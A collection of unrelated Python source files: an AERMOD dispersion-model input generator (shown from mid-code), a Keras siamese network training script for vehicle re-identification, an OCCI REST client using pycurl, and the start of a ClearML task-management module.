'flux':flux, 'width':link['width'], 'geometry':geom, 'buffers':geom.buffer(0.5*link['width']) }) # make the geopandas dataframe with all line source buffers self.lineSources = gpd.GeoDataFrame( rows,geometry = 'geometry',crs = f'epsg:{self.epsg}' ) # make the R-tree of all buffers self.tree = STRtree(self.lineSources.buffers) # add the UID column that is the 12 character hash of the # sourceID self.lineSources['UID'] = self.lineSources.sourceID.apply( lambda ID: hashlib.md5(ID.encode()).hexdigest()[:12] ) print('Finished making sources') def addReceptorLayers(self,source): # link length and number of receptors along the link length = source.geometry.length numReceptors = int(length/receptorSpacing) + 1 # starting position of receptors along the link startPos = 0.5*(length - receptorSpacing*(numReceptors - 1)) receptors = [] for layerID,scale in enumerate(receptorLayerScales): # receptor distance from link centerline dist = scale + 0.5*source.width print('Adding',numReceptors,'for layer',layerID, 'source',source.sourceID) # the link shifted normally to itself on either side offsets = [source.geometry.parallel_offset(dist), source.geometry.parallel_offset(-dist)] for receptorIdx in range(numReceptors): # generate equidistant points along the parallel offsets for offsetIdx,offset in enumerate(offsets): location = offset.interpolate( startPos + receptorIdx*receptorSpacing ) receptorID = '{}_{}_{}_{}'.format( source.sourceID, layerID, receptorIdx, offsetIdx ) receptors.append({ 'receptorID':receptorID, 'location':location }) return receptors def makeGridReceptors(self): # add gridded receptors with xy spacing of receptorSpacing xmin,ymin,xmax,ymax = self.studyArea.bounds numX = int((xmax - xmin)/receptorSpacing) + 1 numY = int((ymax - ymin)/receptorSpacing) + 1 xoffset = 0.5*(xmax - xmin - receptorSpacing*(numX - 1)) yoffset = 0.5*(ymax - ymin - receptorSpacing*(numY - 1)) receptors = [] for xIdx in range(numX): x = xmin + xoffset + xIdx*receptorSpacing for yIdx in range(numY): y = ymin + yoffset + yIdx*receptorSpacing location = Point((x,y)) # skip if the receptor is outside the study area if not self.studyArea.contains(location): continue # add otherwise receptorID = f'grid_{xIdx}_{yIdx}' print('adding grid receptor',receptorID) receptors.append({ 'receptorID':receptorID, 'location':location }) self.receptors = self.receptors.append( receptors,ignore_index = True ) def makeLinkReceptors(self): numSources = len(self.lineSources) receptors = [] for idx,(sourceID,source) in enumerate(self.lineSources.iterrows()): print('Processing source',idx,'out of',numSources) receptors.extend(self.addReceptorLayers(source)) self.receptors = pd.DataFrame( receptors, columns = ['receptorID','geometry'] ) def makeSourceReceptors(self): # iterate over the links that have an emission rate; compute # the number of receptor layers using the log scale of the # link areal emissions rate. The links with the maxFlux # should have 3 layers. The distances of the receptor layers # from the roadway are defined in aermodConst.py maxLogFlux = math.log(self.lineSources.flux.max()) minLogFlux = math.log(self.lineSources.flux.min()) logFluxDiff = maxLogFlux - minLogFlux numSources = len(self.lineSources) receptors = [] for idx,(sourceID,source) in enumerate(self.lineSources.iterrows()): print('Processing source',idx + 1,'out of',numSources) logFlux = math.log(source.flux) numReceptorLayers = 1 + int( len(receptorLayerScales)*(logFlux - minLogFlux)/logFluxDiff ) if numReceptorLayers > len(receptorLayerScales): numReceptorLayers = len(receptorLayerScales) # print('Processing source',idx+1,'out of',numSources, # numReceptorLayers,'layers') receptors.extend(self.addReceptorLayers(source)) self.receptors = pd.DataFrame( receptors,columns = ['receptorID','geometry'] ) def dropReceptorsInSources(self): idsToDrop = set(checkAllReceptors(self.tree,self.receptors)) # remove the receptors that fall into sources self.receptors = self.receptors[ ~self.receptors.receptorID.isin(idsToDrop) ] def saveReceptors(self): # make a GeoDataFrame receptorGDF = gpd.GeoDataFrame( self.receptors,geometry = 'geometry' ) # set crs receptorGDF.crs = f'epsg:{self.epsg}' # drop duplicate receptors receptorGDF = receptorGDF.loc[ receptorGDF.geometry.apply( lambda geom: geom.wkb ).drop_duplicates().index ] # save it receptorGDF.to_file( 'receptors.geojson',driver='GeoJSON',index = False ) def saveSources(self): # transform the 'buffers column to wkb' self.lineSources['buffers'] = [ g.wkt for g in self.lineSources.buffers ] # save self.lineSources.to_file( 'sources.geojson',driver='GeoJSON',index = False ) def readSources(self): try: self.lineSources = gpd.read_file('sources.geojson') self.lineSources = self.lineSources.to_crs( epsg = self.epsg ) # load the buffers from wkb self.lineSources['buffers'] = [ loads(poly) for poly in self.lineSources.buffers ] # make the R-tree of the buffers self.tree = STRtree(self.lineSources.buffers) # make the study area self.studyArea = self.lineSources.unary_union.convex_hull.buffer( receptorSpacing ) print('Read sources.geojson') return True except: return False def readReceptors(self): try: self.receptors = gpd.read_file('receptors.geojson') self.receptors = self.receptors.to_crs( epsg = self.epsg ) print('Read receptors.geojson') return True except: return False def constructSourceLocation(self,subset): return '\n'.join( 'SO LOCATION ' + subset.UID + ' LINE ' + subset.x1.astype(str) + ' ' + subset.y1.astype(str) + ' ' + subset.x2.astype(str) + ' ' + subset.y2.astype(str) ) def constructSourceParam(self,subset): return '\n'.join( 'SO SRCPARAM ' + subset.UID + ' ' + subset.flux.astype(str) + f' {sourceHeight} ' + subset.width.astype(str) ) def constructReceptorCoords(self): return '\n'.join( 'RE DISCCART' + self.receptors.geometry.apply( lambda p: f' {round(p.x,5)} {round(p.y,5)}' ) + ' ' + str(receptorHeight) ) def processAERMETfiles(self,aermetDir): self.aermetDir = aermetDir self.stanumSurf = open(os.path.join( aermetDir,'bestSurfaceStation.txt' )).read() self.stanumAir = open(os.path.join( aermetDir,'bestUpperStation.txt' )).read() self.profbase = float(open(os.path.join( aermetDir,'bestSurfElev.txt' )).read()) upperData = pd.read_csv( os.path.join(aermetDir,'AERMETUPPER.PFL'), sep = '\s+',header = None ) self.year = set(upperData[0]).pop() self.month = set(upperData[1]).pop() def constructAermodInputs(self,title,groupSize,population,day): self.population = population self.day = day self.title = title # bundle groupSize sources together # write the receptors text to a file to be later imported into # the .inp file at run time with open('receptors.txt','w') as f: f.write(self.constructReceptorCoords()) numSources = len(self.lineSources) numGroups = 1 + int(numSources/groupSize) for groupIdx in range(numGroups): start = groupIdx*groupSize end = start + groupSize self.assembleAndWriteInput(start,end) def assembleAndWriteInput(self,start,end): prefix = f'{self.title}_{start}-{end}' subset = self.lineSources.iloc[start:end] aermodInput = aermodTemplate.format( title = prefix, population = self.population, pollutant = self.pollutant, sourceLocation = self.constructSourceLocation(subset), sourceParam = self.constructSourceParam(subset), urbanSource = '\n'.join('SO URBANSRC ' + subset['UID']), receptorCoords = f' INCLUDED receptors.txt', stanumSurf = self.stanumSurf, stanumAir = self.stanumAir, profbase = self.profbase, pathToSurf = os.path.join(self.aermetDir,'AERMETSURFACE.SFC'), pathToUpper = os.path.join(self.aermetDir,'AERMETUPPER.PFL'), year = '20' + str(self.year), month = self.month, day = self.day, postfile = f'{prefix}.out' ) with open(f'{prefix}.inp','w') as f: f.write(aermodInput)
siameseModelIterator-15.py
# coding: utf-8 # In[1]: import datetime import glob import hashlib import multiprocessing as mp import os import queue import random import threading from functools import partial import keras.backend.tensorflow_backend as KTF #import matplotlib.pyplot as plt import numpy as np import tensorflow as tf from keras import backend as K from keras.applications.resnet50 import ResNet50, preprocess_input from keras.callbacks import (EarlyStopping, ModelCheckpoint, ReduceLROnPlateau, TensorBoard) from keras.layers import Dense, GlobalAveragePooling2D, Input, Lambda, merge from keras.layers.normalization import BatchNormalization from keras.models import Model, load_model, model_from_json from keras.optimizers import RMSprop from keras.preprocessing import image from keras.utils.np_utils import to_categorical import pelops.utils as utils from pelops.analysis import analysis from pelops.analysis.camerautil import get_match_id, make_good_bad from pelops.datasets.featuredataset import FeatureDataset from pelops.datasets.veri import VeriDataset from pelops.experiment_api.experiment import ExperimentGenerator from pelops.utils import train_test_key_filter # In[2]: # In[3]: def save_model_workaround(model, model_output_file, weights_output_file): print('saving model to {}'.format(model_output_file)) print('saving weights to {}'.format(weights_output_file)) # serialize model to JSON model_json = model.to_json() with open(model_output_file, 'w') as json_file: json_file.write(model_json) # serialize weights to HDF5 model.save_weights(weights_output_file) def load_model_workaround(model_output_file, weights_output_file): # load json and create model json_file = open(model_output_file, 'r') loaded_model_json = json_file.read() json_file.close() loaded_model = model_from_json(loaded_model_json) # load weights into new model loaded_model.load_weights(weights_output_file) return loaded_model # In[4]: def makework(workitems, chips, cam_id=None): left = chips[0] right = chips[1] same_vehicle = left.car_id == right.car_id same_type = left.misc['vehicle_type'] == right.misc['vehicle_type'] same_color = left.misc['color'] == right.misc['color'] #same_angle = cam_id(left.cam_id) == cam_id(right.cam_id) features = [same_vehicle, same_type, same_color] workitems.append((left.filepath, right.filepath, features)) workitems.append((right.filepath, left.filepath, features)) def make_examples(gen, examples): workitems = [] for _ in range(examples): cameras = gen.generate() match_id = get_match_id(cameras) goods, bads = make_good_bad(cameras, match_id) makework(workitems, goods) makework(workitems, bads) print('made', len(workitems)) return workitems # In[5]: # get a GPU session and reserve memory def get_session(gpu_fraction=0.3): '''Assume that you have 6GB of GPU memory and want to allocate ~2GB''' num_threads = os.environ.get('OMP_NUM_THREADS') gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_fraction) if num_threads: return tf.Session(config=tf.ConfigProto( gpu_options=gpu_options, intra_op_parallelism_threads=num_threads)) else: return tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)) def rgb2bgr(x): """ given an array representation of an RGB image, change the image into an BGR representtaion of the image """ return(bgr2rgb(x)) def bgr2rgb(x): """ given an array representation of an BGR image, change the image into an RGB representtaion of the image """ y = np.zeros(x.shape) B = x[:, :, 0] G = x[:, :, 1] R = x[:, :, 2] y[:, :, 0] = R y[:, :, 1] = G y[:, :, 2] = B return y # load an image from disk # NOTE: input assumed to be RGB # NOTE: output is to be BGR for resnet use. def load_image(img_path, e_dims=False, image_flip=0.5, image_shift=0.20, image_rotate_degrees=15, image_zoom=0.15, output_BGR=True): """ WARNING this funciton should only manipulation images meant for resnet50 consumption. To make it applicable for other environments remove preprocess_input. Do some image manipulation image input assumed to be in RGB format output format default is GBR unless output_BGR is set to False e_dims = e_dims false will output (x,y,3) sized images e_domes true will output (1,x,y,3) sized images image_flip = probability that image will be flipped rt to left image_shift = percent of image to randomly shift up/down & right/left image_rotate_degrees = rotate image randomly between [-image_rotate_degrees image_rotate_degrees] image_zoom = randomly zoom image [1-image_zoom 1+image_zoom] output_BGR = True -> image output will be in BGR formate RGB otherwise """ img = image.load_img(img_path, target_size=(224, 224)) my_img = image.img_to_array(img) if image_flip is not None: if image_flip > 1 or image_flip < -1: raise ValueError('|image_flip:{0}| > 1'.format(image_flip)) image_flip = abs(image_flip) if random.random() > image_flip: my_img = image.flip_axis(my_img, axis=1) if image_rotate_degrees is not None: image_rotate_degrees = int(image_rotate_degrees) if image_rotate_degrees > 360: image_rotate_degrees = image_rotate_degrees % 360 my_img = image.random_rotation(my_img, image_rotate_degrees, row_index=0, col_index=1, channel_index=2) if image_shift is not None: if image_shift > 1 or image_shift < -1: raise ValueError('|image_shift:{0}| > 1'.format(image_shift)) image_shift = abs(image_shift) my_img = image.random_shift(my_img, image_shift, image_shift, row_index=0, col_index=1, channel_index=2) if image_zoom is not None: if image_zoom > 1 or image_zoom < -1: raise ValueError('|image_zoom:{0}| > 1'.format(image_zoom)) image_zoom = abs(image_zoom) low = 1 - image_zoom high = 1 + image_zoom rng = [low, high] my_img = image.random_zoom(my_img, rng, row_index=0, col_index=1, channel_index=2) if not output_BGR: my_img = bgr2rgb(my_img) my_img = np.expand_dims(my_img, axis=0) my_img = preprocess_input(my_img) if not e_dims: my_img = my_img.squeeze() return my_img # In[6]: def plot_run_no(history, name1, name2, rnd=None): """ Take the output of a model. """ v = np.array(history[name1]) vc = np.array(history[name2]) if rnd is not None: vr = np.zeros(vc.shape) vr.fill(rnd) b = np.array([v, vc, vr]) else: b = np.array([v, vc]) c = b.transpose() ax = plt.subplot(111) ax.grid(True) ax.plot(c) if rnd is not None: ax.legend((name1, name2, 'random'), bbox_to_anchor=(1, -0.05), fancybox=True, shadow=True, ncol=5) else: ax.legend((name1, name2), bbox_to_anchor=(1, -0.05), fancybox=True, shadow=True, ncol=5) plt.show() # In[7]: def image_class_generator(tasking, batch_size=32, augment=False): """ Offload the augmentation of images, create images in batch_size chunks augment=False -> return image augment=True -> return augmented image """ while True: lefts = [] rights = [] ys = [] for task in random.sample(tasking, batch_size): left_file = task[0] right_file = task[1] classes = task[2] y = np.zeros(len(classes)) for index, c in enumerate(classes): y[index] = 1 if c else 0 l_img = None r_img = None if augment: l_img = load_image(left_file) r_img = load_image(right_file) else: l_img = load_image(left_file, False, None, None, None, None) r_img = load_image(right_file, False, None, None, None, None) lefts.append(l_img) rights.append(r_img) ys.append(y) yield ([np.array(lefts), np.array(rights)], np.array(ys)) def buffered_gen_mp(source_gen, buffer_size=2, num_processes=4): """ Generator that runs a slow source generator in a separate process. buffer_size: the maximal number of items to pre-generate (length of the buffer) """ if buffer_size < 2: raise RuntimeError("Minimal buffer size is 2!") buffer = mp.Queue(maxsize=buffer_size - 1) # the effective buffer size is one less, because the generation process # will generate one extra element and block until there is room in the # buffer. def _buffered_generation_process(source_gen, buffer): for data in source_gen: buffer.put(data, block=True) buffer.put(None) # sentinel: signal the end of the iterator buffer.close() # unfortunately this does not suffice as a signal: if buffer.get() # was called and subsequently the buffer is closed, it will block # forever. for _ in range(num_processes): process = mp.Process( target=_buffered_generation_process, args=(source_gen, buffer)) process.start() for data in iter(buffer.get, None): yield data # In[8]: def freeze(model): """ Make model untrainable """ for layer in model.layers: layer.trainable = False model.trainable = False # In[9]: def free_model_layers(model): """ Make the model trainable """ for layer in model.layers: try: if layer.name == 'resnet50': print('found resnet') for rn_layer in layer.layers: try: if not rn_layer.trainable: rn_layer.trainable = True except: if 'merge' not in rn_layer.name: print('rn layer not trainable', rn_layer.name) if not layer.trainable: layer.trainable = True except: if 'merge' not in layer.name.lower(): print('layer not trainable:', layer.name) # In[10]: def make_siamese_model_concat(num_training_classes=3): """ Siamese network created via concatenating resnet50 outputs @TODO see if less layers can now be used because of not using binary_crossentropy.. """ base_model = ResNet50(weights='imagenet', include_top=False) freeze(base_model) input_left = Input(shape=(224, 224, 3)) input_right = Input(shape=(224, 224, 3)) processed_left = base_model(input_left) processed_right = base_model(input_right) # join by slapping vectors together siamese_join = merge([processed_left, processed_right], mode='concat') my_layer = GlobalAveragePooling2D()(siamese_join) my_layer = Dense(4096, activation='relu')(my_layer) my_layer = BatchNormalization()(my_layer) my_layer = Dense(2048, activation='relu')(my_layer) my_layer = BatchNormalization()(my_layer) my_layer = Dense(2048, activation='relu')(my_layer) predictions = Dense(num_training_classes, activation='sigmoid')(my_layer) model = Model([input_left, input_right], output=predictions) return model # In[11]: def s_distance(vects): """ return the abs difference between vectors """ x, y = vects s = K.abs(x - y) #s = K.sqrt(K.square(x - y)) return (s) # return K.squeeze(x,1) - K.squeeze(y,1) def s_shape(shapes): """ return the sape of the vector being used """ shape = list(shapes) outshape = (shape[0]) return tuple(outshape) def make_siamese_model_subtract(num_training_classes=2): """ Siamese network created via subtracting resnet50 outputs """ base_model = ResNet50(weights='imagenet', include_top=False) for layer in base_model.layers: layer.trainable = False base_model.trainable = False input_left = Input(shape=(224, 224, 3)) input_right = Input(shape=(224, 224, 3)) processed_left = base_model(input_left) processed_right = base_model(input_right) # use a distance measure for making the join siamese_join = Lambda(s_distance, output_shape=s_shape)([processed_left, processed_right]) my_layer = GlobalAveragePooling2D()(siamese_join) my_layer = Dense(1024, activation='relu')(my_layer) my_layer = BatchNormalization()(my_layer) predictions = Dense(num_training_classes, activation='sigmoid')(my_layer) model = Model([input_left, input_right], output=predictions) return model # In[12]: def make_callbacks(model_checkpoint_format_string, tensor_board_log_dir): """ programatically make the callbacks to be used for training """ callbacks = [] if model_checkpoint_format_string is not None: callbacks.append(ModelCheckpoint(model_checkpoint_format_string, monitor='loss', verbose=1, save_best_only=True, save_weights_only=False, mode='min', period=1)) if tensor_board_log_dir is not None: callbacks.append(TensorBoard(log_dir=tensor_board_log_dir, histogram_freq=0, write_graph=True, write_images=False)) callbacks.append(ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=4, verbose=1, mode='min', epsilon=0.001, cooldown=2, min_lr=0)) callbacks.append(EarlyStopping(monitor='val_acc', min_delta=0.003, patience=6, verbose=1, mode='max')) return callbacks # In[13]: def checkLabels(x): """ Make a warm fuzzy about the classes being balanced """ s_id = 0.0 s_type = 0.0 s_color = 0.0 total = len(x) for v in x: if v[2][0]: s_id += 1 if v[2][1]: s_type += 1 if v[2][2]: s_color += 1 print('P(s_id==1):{0} P(s_type==1):{1} P(s_color==1):{2}'.format( s_id / total, s_type / total, s_color / total)) return s_id / total, s_type / total, s_color / total # In[14]: #--------------------------------------- # In[15]: # set some constants ITEMSPERCAMERA = 2 YRANDOM = 13024 CAMERAS = 2 DROPPED = 0 EXPERIMENTS = int(40000 / 4) batch_size = 16 tbld = '/local_data/dgrossman/tensorboard_logs' mcfs = '/local_data/dgrossman/tempdir/veri-siamese.{epoch:02d}-{val_loss:.2f}-{val_acc:.2f}.hdf5' # In[16]: veri_validate = VeriDataset( '/local_data/dgrossman/VeRi', set_type=utils.SetType.TEST.value) veri_train = VeriDataset('/local_data/dgrossman/VeRi', set_type=utils.SetType.TRAIN.value) expGen_validate = ExperimentGenerator(veri_train, CAMERAS, ITEMSPERCAMERA, DROPPED, YRANDOM, key_filter=partial(train_test_key_filter, split="test")) expGen_train = ExperimentGenerator(veri_train, CAMERAS, ITEMSPERCAMERA, DROPPED, YRANDOM, key_filter=partial(train_test_key_filter, split="train")) # In[17]: training_examples = make_examples(expGen_train, EXPERIMENTS) validaiton_examples = make_examples(expGen_validate, EXPERIMENTS) # GROSSMAN # In[18]: checkLabels(training_examples) # In[19]: checkLabels(validaiton_examples) # In[19]: # GROSSMAN change augment to True when running for real. train_buffered_generator_mp = buffered_gen_mp(image_class_generator(training_examples, batch_size, augment=True), buffer_size=20, num_processes=5) val_buffered_generator_mp = buffered_gen_mp(image_class_generator(validaiton_examples, batch_size, augment=False), buffer_size=20, num_processes=5) # In[20]: callbacks = make_callbacks(mcfs, tbld) # In[21]: KTF.set_session(get_session(.90)) # In[25]: #model = make_siamese_model_concat(3) model = make_siamese_model_subtract(3) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) # In[26]: fixed_history = model.fit_generator(train_buffered_generator_mp, samples_per_epoch=10240, nb_epoch=20, callbacks=None, nb_val_samples=10240, validation_data=val_buffered_generator_mp, verbose=2) fixed_history.history free_model_layers(model) model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy']) free_history = model.fit_generator(train_buffered_generator_mp, samples_per_epoch=10240, nb_epoch=50, callbacks=callbacks, nb_val_samples=10240, validation_data=val_buffered_generator_mp, verbose=2) save_model_workaround(model, '/local_data/dgrossman/model_save_dir/VeRi-siamese-weekend-6.model.json', '/local_data/dgrossman/model_save_dir/VeRi-siamese-weekend-6.weights.hdf5')
clientPyocni.py
# Copyright 2013 Institut Mines-Telecom - Telecom SudParis # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Created on Jun 4, 2013 @author: Marouen Mechtri @contact: marouen.mechtri@it-sudparis.eu @organization: Institut Mines-Telecom - Telecom SudParis @license: Apache License, Version 2.0 """ import pycurl import StringIO import urllib from multiprocessing import Process, Value import simplejson as json import ast class OCCIinterfaceClient: def __init__(self, host, port, category, entity): self.host = host self.port = port self.category = category self.entity = entity def postall_process(self): resource = {} resource['resources']=[self.entity] c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/') c.setopt(c.HTTPHEADER, ['Accept:text/plain', 'Content-Type: application/occi+json']) c.setopt(pycurl.POSTFIELDS, json.dumps(resource)) c.setopt(c.CUSTOMREQUEST, 'POST') c.perform() def update_process(self): resource = {} resource['resources']=[self.entity] c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/' + self.entity['id']) c.setopt(c.HTTPHEADER, ['Accept:text/plain', 'Content-Type: application/occi+json']) c.setopt(pycurl.POSTFIELDS, json.dumps(resource)) c.setopt(c.CUSTOMREQUEST, 'PUT') c.perform() def action_process(self, action, uuid): actionresource = ['actions'] actionresource[0]={} actionresource[0]['term']=action actionresource[0]['scheme']='http://schemas.ogf.org/occi/infrastructure/' + self.category + 'action#' actions = {} actions['actions'] = actionresource c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/' + uuid + '?action=' + action) c.setopt(c.HTTPHEADER, ['Accept:text/plain', 'Content-Type: application/occi+json']) c.setopt(c.CUSTOMREQUEST, 'POST') c.setopt(pycurl.POSTFIELDS, json.dumps(actions)) c.perform() def get_process(self, uuid): storage = StringIO.StringIO() c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/' + uuid) c.setopt(c.HTTPHEADER, ['Accept:application/occi+json', 'Content-Type: application/occi+json']) c.setopt(c.CUSTOMREQUEST, 'GET') c.setopt(c.WRITEFUNCTION, storage.write) c.perform() content = storage.getvalue() resources = ast.literal_eval(content) return resources['resources'][0]['attributes']['occi'][self.category] def post_process(self, uuid): attribute = {} attribute [self.category] = self.entity occi = {} occi['occi'] = attribute categ = {} categ['id'] = uuid categ['attributes'] = occi categ['kind'] = 'http://schemas.ogf.org/occi/infrastructure#' + self.category resource = {} resource['resources']=[categ] c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/') c.setopt(c.HTTPHEADER, ['Accept:text/plain', 'Content-Type: application/occi+json']) c.setopt(pycurl.POSTFIELDS, json.dumps(resource)) c.setopt(c.CUSTOMREQUEST, 'POST') c.perform() def delete_process(self, uuid): c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/' + uuid) c.setopt(c.HTTPHEADER, ['Accept:text/plain', 'Content-Type: application/occi+json']) c.setopt(c.CUSTOMREQUEST, 'DELETE') c.perform() def GetElement_pathuuid(self, pathuuid): parametres = {} templist = pathuuid.split() pathuuid = ''.join(templist) temppath = pathuuid[7:] parametres['host']=temppath[:temppath.find(':')] temppath = temppath[temppath.find(':')+1:] if (temppath.find('/') != -1): parametres['port']=temppath[:temppath.find('/')] temppath = temppath[temppath.find('/')+1:] parametres['category']=temppath[:temppath.find('/')] parametres['uuid']=temppath[temppath.find('/')+1:] else: parametres['port']=temppath return parametres def GET(self, uuid): p1 = Process(target = self.get_process, args = (uuid,)) p1.start() def POSTall(self): p1 = Process(target = self.postall_process) p1.start() def POST(self, uuid): p1 = Process(target = self.post_process, args = (uuid,)) p1.start() def DELETE(self, uuid): p1 = Process(target = self.delete_process, args = (uuid,)) p1.start() def PUT(self): p1 = Process(target = self.update_process) p1.start() def action(self, action, uuid): p1 = Process(target = self.action_process, args = (action, uuid)) p1.start() if __name__ == '__main__': deletes = OCCIinterfaceClient('127.0.0.1', '8085', 'intercng', {}) deletes.DELETE('mmmaraa-dd9a-dd504f-8861-aeadsds')
task.py
""" Backend task management support """ import itertools import json import logging import os import re import sys from copy import copy from enum import Enum from multiprocessing import RLock from operator import itemgetter from tempfile import gettempdir from threading import Thread from typing import Optional, Any, Sequence, Callable, Mapping, Union, List, Set from uuid import uuid4 from pathlib2 import Path try: # noinspection PyCompatibility from collections.abc import Iterable except ImportError: from collections import Iterable import six from collections import OrderedDict from six.moves.urllib.parse import quote from ...utilities.locks import RLock as FileRLock from ...utilities.proxy_object import verify_basic_type from ...binding.artifacts import Artifacts from ...backend_interface.task.development.worker import DevWorker from ...backend_interface.session import SendError from ...backend_api import Session from ...backend_api.services import tasks, models, events, projects from ...backend_api.session.defs import ENV_OFFLINE_MODE from ...utilities.pyhocon import ConfigTree, ConfigFactory from ...utilities.config import config_dict_to_text, text_to_config_dict from ..base import IdObjectBase, InterfaceBase from ..metrics import Metrics, Reporter from ..model import Model from ..setupuploadmixin import SetupUploadMixin from ..util import ( make_message, get_or_create_project, get_single_result, exact_match_regex, mutually_exclusive, ) from ...config import ( get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR, running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir, get_log_to_backend, ) from ...debugging import get_logger from ...storage.helper import StorageHelper, StorageError from .access import AccessMixin from .repo import ScriptInfo, pip_freeze from .hyperparams import HyperParams from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR from ...utilities.process.mp import SingletonLock class Task(IdObjectBase, AccessMixin, SetupUploadMixin): """ Task manager providing task object access and management. Includes read/write access to task-associated frames and models. """ _anonymous_dataview_id = '__anonymous__' _development_tag = 'development' archived_tag = 'archived' _default_configuration_section_name = 'General' _legacy_parameters_section_name = 'Args' _force_requirements = {} _store_diff = config.get('development.store_uncommitted_code_diff', False) _store_remote_diff = config.get('development.store_code_diff_from_remote', False) _report_subprocess_enabled = config.get('development.report_use_subprocess', True) _offline_filename = 'task.json' class TaskTypes(Enum): def __str__(self): return str(self.value) def __eq__(self, other): return str(self) == str(other) training = 'training' testing = 'testing' inference = "inference" data_processing = "data_processing" application = "application" monitor = "monitor" controller = "controller" optimizer = "optimizer" service = "service" qc = "qc" custom = "custom" class TaskStatusEnum(Enum): def __str__(self): return str(self.value) def __eq__(self, other): return str(self) == str(other) created = "created" queued = "queued" in_progress = "in_progress" stopped = "stopped" published = "published" publishing = "publishing" closed = "closed" failed = "failed" completed = "completed" unknown = "unknown" class DeleteError(Exception): pass def __init__(self, session=None, task_id=None, log=None, project_name=None, task_name=None, task_type=TaskTypes.training, log_to_backend=True, raise_on_validation_errors=True, force_create=False): """ Create a new task instance. :param session: Optional API Session instance. If not provided, a default session based on the system's configuration will be used. :type session: Session :param task_id: Optional task ID. If not provided, a new task will be created using the API and its information reflected in the resulting instance. :type task_id: string :param log: Optional log to be used. If not provided, and internal log shared with all backend objects will be used instead. :type log: logging.Logger :param project_name: Optional project name, used only if a new task is created. The new task will be associated with a project by this name. If no such project exists, a new project will be created using the API. :type project_name: str :param task_name: Optional task name, used only if a new task is created. :type project_name: str :param task_type: Optional task type, used only if a new task is created. Default is training task. :type task_type: str (see tasks.TaskTypeEnum) :param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API. This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND. :type log_to_backend: bool :param force_create: If True a new task will always be created (task_id, if provided, will be ignored) :type force_create: bool """ SingletonLock.instantiate() task_id = self._resolve_task_id(task_id, log=log) if not force_create else None self.__edit_lock = None super(Task, self).__init__(id=task_id, session=session, log=log) self._project_name = None self._storage_uri = None self._input_model = None self._output_model = None self._metrics_manager = None self.__reporter = None self._curr_label_stats = {} self._raise_on_validation_errors = raise_on_validation_errors self._parameters_allowed_types = tuple(set( six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None)) )) self._app_server = None self._files_server = None self._initial_iteration_offset = 0 self._reload_skip_flag = False if not task_id: # generate a new task self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type) if self._offline_mode: self.data.id = self.id self.name = task_name else: # this is an existing task, let's try to verify stuff self._validate() if self.data is None: raise ValueError("Task ID \"{}\" could not be found".format(self.id)) self._project_name = (self.project, project_name) if running_remotely() or DevWorker.report_stdout: log_to_backend = False self._log_to_backend = get_log_to_backend(default=log_to_backend) self._artifacts_manager = Artifacts(self) self._hyper_params_manager = HyperParams(self) def _validate(self, check_output_dest_credentials=True): raise_errors = self._raise_on_validation_errors output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False) if output_dest and check_output_dest_credentials: try: self.log.info('Validating output destination') conf = get_config_for_bucket(base_url=output_dest) if not conf: msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest self.log.warning(msg) if raise_errors: raise Exception(msg) except StorageError: raise except Exception as ex: self.log.error('Failed trying to verify output destination: %s' % ex) @classmethod def _resolve_task_id(cls, task_id, log=None): if not task_id: task_id = cls.normalize_id(get_remote_task_id()) if task_id: log = log or get_logger('task') log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id)) return task_id def _update_repository(self): def check_package_update(): # noinspection PyBroadException try: # check latest version from ...utilities.check_updates import CheckPackageUpdates latest_version = CheckPackageUpdates.check_new_package_available(only_once=True) if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get( default=config.get('development.suppress_update_message', False)): if not latest_version[1]: sep = os.linesep self.get_logger().report_text( '{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format( Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])), ) else: self.get_logger().report_text( 'ClearML new version available: upgrade to v{} is recommended!'.format( latest_version[0]), ) except Exception: pass # get repository and create requirements.txt from code base try: check_package_update_thread = Thread(target=check_package_update) check_package_update_thread.daemon = True check_package_update_thread.start() # do not request requirements, because it might be a long process, and we first want to update the git repo result, script_requirements = ScriptInfo.get( filepaths=[self._calling_filename, sys.argv[0], ] if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ], log=self.log, create_requirements=False, check_uncommitted=self._store_diff, uncommitted_from_remote=self._store_remote_diff ) for msg in result.warning_messages: self.get_logger().report_text(msg) # if the git is too large to store on the task, we must store it as artifact: if result.auxiliary_git_diff: diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n" diff_preview += '\n'.join( line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git ')) self._artifacts_manager.upload_artifact( name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff, preview=diff_preview, ) # store original entry point entry_point 